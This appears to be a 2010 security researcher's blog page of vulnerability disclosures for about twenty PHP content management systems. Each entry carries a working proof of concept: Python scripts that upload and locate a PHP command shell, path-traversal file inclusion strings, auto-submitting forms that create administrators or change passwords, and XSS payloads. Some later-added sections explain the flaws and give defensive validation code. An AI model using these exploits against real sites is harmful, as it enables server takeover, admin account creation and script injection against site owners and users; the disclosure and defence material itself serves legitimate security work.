This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

CMS Made Simple 1.8 Download Manager 1.4.1 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Download Manager 1.4.1 Module can be exploited to upload a PHP shell.

PoC
import socket, re

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 189\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\
        + re.search(u'shell_[^.]+\.php', resp).group(0)

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
    else: print 'shell located at http://' + host + shell_path

upload_shell()

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Antz Toolkit 1.02 Module can be exploited to upload a PHP shell.

PoC
import socket

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 257\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="antzSeed"\r\n'
           '\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    s.close()

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    print 'searching for shell'

    for i in range(0, 9999):

        shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(8)

        s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
               'Host: ' + host + '\r\n\r\n')

        if http_ok in s.recv(8192)[:len(http_ok)]:
            print '\r\nshell located at http://' + host + shell_path
            break
        else:
            print '.',

upload_shell()

CMS Made Simple 1.8 Local File Inclusion

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

PoC
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
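The local file inclusion PoCs on this page (CMS Made Simple above, nuBuilder and Bit Weaver below) all work the same way: a request parameter is joined onto a base directory and passed to include(), so "../" sequences walk out of the directory and a trailing NUL byte drops whatever suffix the script appends. The block below is an added example, not code from any of these projects, showing the checks a hardened language-file loader applies before a value like default_cms_lang reaches the filesystem. The base directory, the whitelist of installed languages and the function name are constructed for illustration.

```python
import posixpath
import re

# Added example (not CMS Made Simple, nuBuilder or Bit Weaver code): turning a user-supplied
# "language" parameter into an include path safely. LANG_DIR and ALLOWED_LANGS are constructed.

LANG_DIR = "/var/www/cmsms/lang"              # assumed base directory for language files
ALLOWED_LANGS = {"en_US", "de_DE", "fr_FR"}   # constructed whitelist of installed languages
_LANG_RE = re.compile(r"^[A-Za-z]{2}_[A-Za-z]{2}$")


def classify_lang_param(value):
    """Return (path, reason). path is None unless the value is safe to include.

    The reason string is what a defender would want to see in a log entry: it names
    which control rejected the value rather than just reporting 'invalid'.
    """
    if value is None or value == "":
        return None, "empty"
    if "\x00" in value:
        # A NUL truncates the path in older PHP builds; the PoC above relies on it
        # to discard the suffix the script appends.
        return None, "null byte"
    if "/" in value or "\\" in value or ".." in value:
        return None, "path separator or traversal"
    if not _LANG_RE.match(value) or value not in ALLOWED_LANGS:
        # Positive validation: only names that are known to exist are accepted at all.
        return None, "not an installed language"
    candidate = posixpath.normpath(posixpath.join(LANG_DIR, value + ".php"))
    # Defence in depth: even after the checks above, confirm the result is still
    # inside LANG_DIR before it is handed to include().
    if posixpath.commonpath([LANG_DIR, candidate]) != LANG_DIR:
        return None, "escapes base directory"
    return candidate, "ok"
```

The whitelist is the control that actually closes the hole; the NUL and separator checks exist so that an attempt is logged with a precise reason, and the final containment check guards against a future change that loosens the whitelist. The same shape applies to the dir and style parameters of the nuBuilder and Bit Weaver PoCs: resolve against a fixed base, accept only known names, and verify containment of the resolved path.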

Orbis 1.0.2 Authentication Bypass

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin-related scripts issue a redirect by setting the Location header but do not terminate afterwards, so the rest of the script still runs for unauthenticated requests.

PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@
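The bug described above is the classic PHP header('Location: ...') without a following exit: the browser is told to go to the login page, but the server keeps executing and performs the privileged action anyway. The block below is an added example, not Orbis code, that models the two versions of such a handler so the difference is testable. The Response class, the handler names and the users list are constructed for illustration.

```python
# Added example, not code from Orbis: a minimal model of "redirect without exit".
# Response, create_admin_vulnerable, create_admin_fixed and the users list are constructed.

class Response:
    """Just enough of an HTTP response to show status and headers."""
    def __init__(self):
        self.status = 200
        self.headers = {}

    def redirect(self, location):
        # Mirrors PHP header('Location: ...'): it only sets the header. It does NOT
        # stop the script; that is the caller's job.
        self.status = 302
        self.headers["Location"] = location


def create_admin_vulnerable(session, username, users):
    """Sets a redirect for anonymous callers but keeps running afterwards."""
    resp = Response()
    if not session.get("is_admin"):
        resp.redirect("/admin/login.php")
    users.append(username)            # reached even when nobody is logged in
    return resp


def create_admin_fixed(session, username, users):
    """Returns immediately after issuing the redirect (the PHP equivalent of exit)."""
    resp = Response()
    if not session.get("is_admin"):
        resp.redirect("/admin/login.php")
        return resp                   # nothing below runs for anonymous callers
    users.append(username)
    return resp
```

Both versions send the anonymous caller to the login page, which is why the bug is easy to miss when testing by hand in a browser: the visible behaviour is a redirect in each case, and only the side effect differs. When auditing PHP code for this pattern, look for every header('Location') call and confirm it is followed by exit or return on the same path; a central authentication check that runs before any action code, rather than inside each script, removes the per-script opportunity to forget it.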

PyroCMS 0.9.9.1 Cross-site Request Forgery

A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="email" value="new_admin@x.com" />
<input type="hidden" name="username" value="new_admin" />
<input type="hidden" name="display_name" value="a" />
<input type="hidden" name="group" value="admin" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="password" value="Password1" />
<input type="hidden" name="confirm_password" value="Password1" />
<input type="hidden" name="btnAction" value="save" />
</form>
</body>
</html>

LifeType 1.2.10 Cross-site Request Forgery

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
</body>
</html>

Globber 1.4 Cross-site Request Forgery

A cross-site request forgery vulnerability in Globber can be exploited to add and delete blog posts.

PoC
<!-- Add (note that blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
<input type="hidden" name="title" value="New Article" />
<input type="hidden" name="date" value="06-07-2010 10:16 pm" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
</form>
</body>
</html>

<!-- Delete -->
<html>
<body>
<img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>

InterPhoto 2.3.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

PoC
<html>
<body>
<img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
</body>
</html>

chillyCMS 1.1.3 Cross-site Request Forgery

A cross-site request forgery vulnerability in chillyCMS 1.1.3 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/chillyCMS/admin/usersgroups.site.php">
<input type="hidden" name="user" value="new_admin" />
<input type="hidden" name="name" value="a" />
<input type="hidden" name="pw" value="Password1" />
<input type="hidden" name="pw2" value="Password1" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="gids%5B%5D" value="1" />
<input type="hidden" name="gids%5B%5D" value="3" />
<input type="hidden" name="gids%5B%5D" value="4" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="language" value="en" />
<input type="hidden" name="getnewsletter" value="1" />
<input type="hidden" name="myaction" value="new" />
<input type="hidden" name="action" value="updateuser" />
<input type="hidden" name="id" value="" />
</form>
</body>
</html>

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E

PeteWiki 0.6 Reflected XSS

A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E

Lion Wiki 3.2.3 Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in Lion Wiki 3.2.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/lionwiki/index.php?error=%3Cscript%3Ealert(0)%3C/script%3E&page=a

Monday, July 5, 2010

NetworX 1.0.3 Arbitrary Upload

An arbitrary upload vulnerability in NetworX 1.0.3 can be exploited to upload a PHP shell.

PoC
import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    shell_path = path + '/tmp/shell.php'

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
    else: print 'shell located at http://' + host + shell_path

upload_shell()

nuBuilder 10.04.20 Local File Inclusion

A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini

Lanius CMS 0.5.2 r1668 Cross-site Request Forgery

A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user">
<input type="hidden" name="task" value="create" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_name" value="a" />
<input type="hidden" name="user_user" value="new_admin" />
<input type="hidden" name="user_email" value="a@a.com" />
<input type="hidden" name="user_lang" value="" />
<input type="hidden" name="user_tz" value="" />
<input type="hidden" name="user_gid" value="5" />
<input type="hidden" name="user_password" value="Password1" />
<input type="hidden" name="user_password1" value="Password1" />
</form>
</body>
</html>

Log1 CMS 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in Log1 CMS 2.0 can be exploited to change the admin username and password.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
<input type="hidden" name="title" value="log1 CMS" />
<input type="hidden" name="desc" value="log1cms official page" />
<input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
<input type="hidden" name="language" value="0" />
<input type="hidden" name="bgcolor" value="#ffffff" />
<input type="hidden" name="textcolor" value="#999999" />
<input type="hidden" name="specialcolor" value="#000000" />
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="pass" value="Password1" />
<input type="hidden" name="isMd5" value="1" />
<input type="hidden" name="google_login" value="gerard.caplain" />
<input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
<input type="hidden" name="copyright" value="2010 by log1" />
</form>
</body>
</html>

ATutor 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in ATutor 2.0 can be exploited to create a new admin (new_admin/Password1).

PoC
<html>
<body onload="document.forms[0].submit.click()">
<form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
<input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
<input type="hidden" name="password_error" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="confirm_password" value="" />
<input type="hidden" name="real_name" value="" />
<input type="hidden" name="email" value="x@x.com" />
<input type="hidden" name="priv_admin" value="1" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
</html>

nuBuilder 10.04.20 Reflected XSS

An XSS vulnerability in nuBuilder 10.04.20 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/nuedit.php?f=%3Cscript%3Ealert(0)%3C/script%3E

News Office 2.0.18 Reflected XSS

An XSS vulnerability in News Office 2.0.18 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

Bit Weaver 2.7 Reflected XSS

An XSS vulnerability in Bit Weaver 2.7 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

odCMS 1.07 Reflected XSS

An XSS vulnerability in odCMS 1.07 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E

NetworX 1.0.3 Reflected XSS

An XSS vulnerability in NetworX 1.0.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Orbis 1.0.2 Reflected XSS

An XSS vulnerability in Orbis 1.0.2 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Thursday, July 1, 2010

TomatoCart 1.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in TomatoCart 1.0 can be exploited to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/tomatocart/admin/json.php?module=administrators&action=save_administrator&modules=categories%2Cfeature_products_manager%2Cmanufacturers%2Cproduct_variants%2Cproducts%2Cproducts_attributes%2Cproducts_expected%2Cquantity_discount_groups%2Creviews%2Csearch_terms%2Cspecials%2Cconfiguration%2Cwizard_installation%2Chomepage_meta_info%2Carticles%2Carticles_categories%2Cfaqs%2Cslide_images%2Crecorvered_cart%2Ccoupons%2Ccredits_memo%2Ccustomers%2Ccustomers_groups%2Cemail%2Cgift_certificates%2Cinvoices%2Corders%2Corders_returns%2Cpurchased_downloadables%2Ccountries%2Ccredit_cards%2Ccurrencies%2Cimage_groups%2Cinformation%2Clanguages%2Corders_status%2Ctax_classes%2Cunit_classes%2Cweight_classes%2Czone_groups%2Cmodules_geoip%2Cmodules_order_total%2Cmodules_payment%2Cmodules_shipping%2Cservices%2Creports_customers%2Creports_products%2Creports_web%2Clogo_upload%2Ctemplates%2Ctemplates_modules%2Ctemplates_modules_layout%2Cadministrators%2Cadministrators_log%2Cbackup%2Cbanner_manager%2Ccache%2Cdashboard%2Cemail_templates%2Cfile_manager%2Cgoogle_sitemap%2Cimages%2Cimport_export%2Cnewsletters%2Cserver_info%2Cwhos_online&access_globaladmin=on&user_name=new_admin&user_password=Password1&email_address=test%40test.com" />
</body>
</html>
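Every CSRF PoC on this page (PyroCMS, LifeType, Globber, InterPhoto, chillyCMS, Lanius CMS, Log1 CMS, ATutor and TomatoCart above) relies on the same two weaknesses: the admin action accepts a request carrying nothing but the victim's ambient session cookie, and several of them accept it over a plain GET, which is why an img tag is enough. The block below is an added example, not code from any of those projects, showing the synchronizer-token check plus the method and Origin checks that reject such requests. ALLOWED_ORIGINS, the session dictionary layout and the create_admin() handler are constructed for illustration.

```python
import hmac
import secrets

# Added example (not PyroCMS, LifeType, Globber, InterPhoto, chillyCMS, Lanius CMS,
# Log1 CMS, ATutor or TomatoCart code): anti-CSRF gating for a state-changing admin action.
# ALLOWED_ORIGINS, the session layout and create_admin() are constructed.

ALLOWED_ORIGINS = {"http://localhost"}                 # assumed: the application's own origin(s)
STATE_CHANGING = ("POST", "PUT", "PATCH", "DELETE")


def issue_csrf_token(session):
    """Mint a random per-session token; the server embeds it in every admin form it renders."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def csrf_check(session, method, headers, form):
    """Return None when the request may proceed, otherwise a rejection reason."""
    method = method.upper()
    if method not in STATE_CHANGING:
        # An <img src=...> forgery arrives as GET; side effects over GET are refused outright.
        return "state change over " + method
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        # A form auto-submitted from an attacker's page carries that page's Origin.
        # Absence is tolerated (older clients omit it); presence must match.
        return "cross-origin request"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        # The forged forms above cannot read the victim's token, so they cannot supply it.
        return "missing csrf token"
    if not hmac.compare_digest(expected, supplied):
        return "csrf token mismatch"
    return None


def create_admin(session, method, headers, form, users):
    """Admin-creation handler: every check runs before the write happens."""
    reason = csrf_check(session, method, headers, form)
    if reason is not None:
        return 403, reason
    users.append(form["username"])
    return 200, "created"
```

The token must be unguessable, tied to the authenticated session, and compared in constant time; the Origin test is a secondary control, useful because it also catches forms that were copied from a legitimate page. Refusing side effects over GET is what turns the img-based PoCs into harmless broken images, independent of the token.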

Bit Weaver 2.7 Local File Inclusion

A local file inclusion vulnerability in Bit Weaver 2.7 can be exploited to include arbitrary files.

PoC
http://localhost/bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini

Wiki Web Help 0.2.7 Arbitrary Upload

An arbitrary upload vulnerability in Wiki Web Help 0.2.7 can be exploited to upload a PHP shell.


PoC
import sys, socket
host = 'localhost'
path = '/wwh'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/handlers/uploadimage.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'Content-Length: 194\r\n'
           'Cache-Control: max-age=0\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    s.send('GET ' + path + '/images/shell.php HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192): print 'shell not found'
    else: print 'shell located at ' + path + '/images/shell.php'

upload_shell()
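The four arbitrary upload PoCs on this page (CMS Made Simple Download Manager, Antz Toolkit, NetworX and Wiki Web Help above) succeed because the handler stores whatever filename the multipart part declares, inside a directory the web server will execute scripts from. The block below is an added example, not code from any of those projects, of the server-side validation an upload handler should apply before anything touches disk. The allowed-type table, size limit and storage directory are constructed for illustration.

```python
import os
import secrets

# Added example (not CMS Made Simple, Antz Toolkit, NetworX or Wiki Web Help code):
# server-side checks for an image upload handler. UPLOAD_DIR and ALLOWED are constructed.

UPLOAD_DIR = "/var/www/data/uploads"   # assumed: outside the web root, scripts never executed here

# Allowed extension -> magic bytes the file content must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def validate_upload(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (stored_name, None) if the upload is acceptable, else (None, reason).

    stored_name is a server-generated random name with the validated extension; the
    client-supplied name is never reused, so traversal or double extensions in it are moot.
    """
    if "\x00" in filename:
        return None, "null byte in filename"
    # Strip any directory component the client sent (either separator style).
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return None, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        # This is the check that rejects the shell.php uploads from the PoCs above.
        return None, "extension not allowed: " + ext
    if len(data) > max_bytes:
        return None, "too large"
    if not data.startswith(ALLOWED[ext]):
        # A script renamed to .png has no image header.
        return None, "content does not match extension"
    if b"<?php" in data or b"<?=" in data:
        # Heuristic against image/PHP polyglots; the real control is that UPLOAD_DIR
        # is never served with script execution enabled.
        return None, "embedded php tag"
    stored = secrets.token_hex(16) + "." + ext
    return stored, None


def stored_path(stored_name):
    """Absolute path under UPLOAD_DIR for a name returned by validate_upload()."""
    return os.path.join(UPLOAD_DIR, stored_name)
```

The decisive controls are the extension allow-list combined with a server-generated single-extension name, and a storage directory outside the web root. The second point matters because Apache's multiple-extension handling can still execute a file named shell.php.png in a directory with a PHP handler; generating the name yourself removes that class of problem regardless of how the server is configured.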

Wiki Web Help 0.2.7 Persistent/Reflected XSS

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.

Exploit
Persistent: Event attributes are not removed from user-submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML-encode user-submitted data.

PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E
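The reflected XSS PoCs on this page (ImpressCMS, RunCMS, PeteWiki, Lion Wiki, nuBuilder, News Office, Bit Weaver, odCMS, NetworX, Orbis and the Wiki Web Help rev field) all echo a query-string value into the page without encoding; the persistent Wiki Web Help case keeps event-handler attributes on elements that users are allowed to submit as HTML. The block below is an added example, not Wiki Web Help code or that of any other project here, showing both controls: output encoding for reflected values, and an allow-list sanitizer that rebuilds user HTML while dropping script elements, on* attributes and non-http link targets. The tag and attribute allow-lists are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Added example (not Wiki Web Help code): output encoding for reflected input and an
# allow-list sanitizer for stored user HTML. ALLOWED_TAGS / ALLOWED_ATTRS are constructed.

ALLOWED_TAGS = {"a", "b", "i", "p", "div", "span", "ul", "li", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "div": {"class"}, "span": {"class"}, "p": {"class"}}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}   # element and its text are both removed


def encode_for_html(value):
    """Reflected case: encode untrusted text before placing it in an HTML document."""
    return html.escape(value, quote=True)


class _Sanitizer(HTMLParser):
    """Re-emits only allow-listed tags and attributes; everything else is discarded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0           # > 0 while inside a dropped element such as <script>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, val in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue              # event handlers and unknown attributes are dropped
            if name == "href" and not (val or "").strip().lower().startswith(("http://", "https://", "/")):
                continue              # blocks javascript: and data: URLs
            kept.append(' %s="%s"' % (name, html.escape(val or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    """Persistent case: reduce user-submitted HTML to the allow-listed subset."""
    p = _Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)
```

Encoding is the right tool when the value is meant to be text, as with the rev parameter; sanitizing is only for the narrow case where users are genuinely allowed to submit markup, and then the safe approach is to rebuild from an allow-list rather than to strip known-bad patterns. Note that the persistent PoC above also uses a style attribute to make the element cover the page; the sanitizer drops style along with the event handler because neither is on the allow-list for div.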